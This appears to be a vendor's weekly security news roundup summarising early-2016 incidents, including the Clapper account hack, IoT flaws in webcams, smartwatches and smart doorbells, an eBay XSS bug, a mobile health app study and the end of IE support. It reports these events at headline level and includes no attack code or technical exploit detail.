Weekly Security Roundup #61: Multiple Internet of Things Vulnerabilities Exposed
Do you really need an Internet-connected fridge (that can get infected)?
There are over a hundred security news sources that I monitor for our weekly security roundup. Some publish a couple of articles every day, a few only write weekly, while others write tens of posts daily.
Not a single day passes without finding out about a fresh hack or data breach or vulnerability warning. They’ve become so common, so dull, that even I surprise myself sometimes thinking “Oh, again, another one? Boring!“.
Despite all the disturbing news, most people don’t care. They don’t adopt even the most basic security measures. They consider themselves immune and are under the delusion that nothing bad can ever happen to them.
Unfortunately, all evidence proves otherwise.
Not that I want to trigger you any nightmares, but please read further:
Security articles of the week
Not even the US intelligence director is protected from attacks. Cracka, the teenage hacker who last year breached into CIA‘s director AOL email account, struck again. This time, the target was James Clapper, the chief of National Intelligence of the USA.
Cracka contacted a Vice Motherboard journalist and claimed responsibility for breaking into a series of mister Clapper’s accounts, including personal email, Verizon phone and internet, and his wife’s Yahoo email. Furthermore, he forwarded calls for Clapper’s house to the Free Palestine Movement.
“You Asked why I did it. I just wanted the gov to know people aren’t fucking around, people know what they’re doing and people don’t agree #FreePalestine.”
There’s been a lot of talk on this subject recently. If you completely missed out, long story short goes like this: a Romanian worker was fired in 2007 for using the Yahoo account during work to send personal messages. He went to the European Court of Human Rights and the trial just ended.
The issue at hand is that most of the media misinterpreted the decision, exaggerated it and propagated the idea that now all the bosses are entitled to spy on their employees online private conversations.
Here are a few things that were left out:
a) The Yahoo account was created at the employer’s request, so that the employee would communicate with the company’s clients.
b) The employer notified the employees that their online activity will be monitored and that no private conversations are allowed from the company’s computers.
c) The European Court of Human Rights doesn’t dictate a country’s rules.
For further explanations, do read Darren Newman’s article.
Thinking of buying yourself a smartwatch this year? Or do you already own one? Beware of all the new doors they open for cyber criminals.
A student just demonstrated how attackers can obtain sensible information, such as your card PIN code, through the data recorded by your smartwatch.
We continue the series of news related to Internet of Things vulnerabilities. The researchers at Vectra Networks recently unveiled how a D-Link webcam can be used by cyber attackers.
“The point of this demonstration is to highlight the real impact that IoT devices pose to the attack surface of a network. […] the barriers to hacking these devices are relatively low, and even the most basic devices can provide the plumbing for a persistent command-and-control channel. While these devices are low-value in terms of hard costs, they still matter to the security of the network, and teams need to keep an eye on them to reveal any signs of malicious behavior.”
They also declared that they disclosed the issue to D-Link in early December, but it hasn’t been solved yet.
In the following years we’ll most likely be flooded with news related to smart homes vulnerabilities. The most recent one addresses Smart Doorbells. If you had no idea these even existed, don’t worry, you are not the only one – I also just found out about them.
It looks like smart doorbells alert you when a visitor presses your doorbell, they allow you to view the visitor and also to communicate with them. You don’t even need to be at home to open the front door, you can do all these via a dedicated app on your smartphone.
However, thanks to a security hole, they also expose your home WiFi password, which could lead to other potential risks.
For the 5th Annual State of Application Security Report, 71 popular mobile health apps were tested for security vulnerabilities. They also surveyed 1.083 individuals from the US, UK, Germany and Japan – consumers, but also IT decision makers within organizations that produce mobile health and mobile finance apps.
What they revealed is a huge discrepancy between the perception of the users and the reality:
– 81% feel their mobile apps are adequately secure (78% of health app users; 87% of app execs)
– 86% of apps tested had at least two critical security vulnerabilities
– 81% of healthcare organizations have been breached in the past 2 years
– 50% of organizations have zero budget allocated for mobile security
A researcher who goes by the name of MLT explained in a detailed post how to exploit an eBay XSS bug in order to conduct phishing attacks.
According to eBay, the bug was quickly patched.
Evan Andersen, a Canadian software engineer, posted about a bug that let the porn from his previous Google Chrome incognito session leak and load several hours later, on a screen within the game Diablo III. He reported the problem both to Google Chrome and Nvidia. Apparently, the issue wasn’t related to the hardware company’s memory management, but rather to Apple. Nvidia’s spokesperson declared that:
“The NVIDIA driver adheres to policies set by the operating system and our driver is working as expected. We have not seen this issue on Windows, where all application-specific data is cleared before memory is released to other applications.”
During the S4 ICS Security Conference, U.S. government cyber security official warned about the rise of attacks on industrial system networks.
Marty Edwards, who runs the Department of Homeland Security’s Industrial Control System Cyber Emergency Response Team, said he believed the increase is mainly caused because the control systems are directly connected to the internet.
This discussion comes after the recent cyber attacks on electric distribution companies in Ukraine, that led to power outage on December 23rd.
On January 12, Microsoft ceased to offer support for Windows XP Embedded SP3 and old Internet Explorer versions. Only Internet Explorer 11 will continue to receive security updates, compatibility fixes and technical support on Windows 7, 8.1 and 10.
Although this change was announced back in August 2014, it still brings plenty of potential risks.
Scared? Panicked? Eager to crawl under a rock and live there for the rest of your life? Well, all these feelings are justified. The more you get to read about cyber security and the never-ending hacking and breaching series of news, the more powerless we seem in front of the ones ill-intentioned. But do not despair, there’s still hope. You just have to stay focused on the things that are in your control and do everything to reduce the possible risks.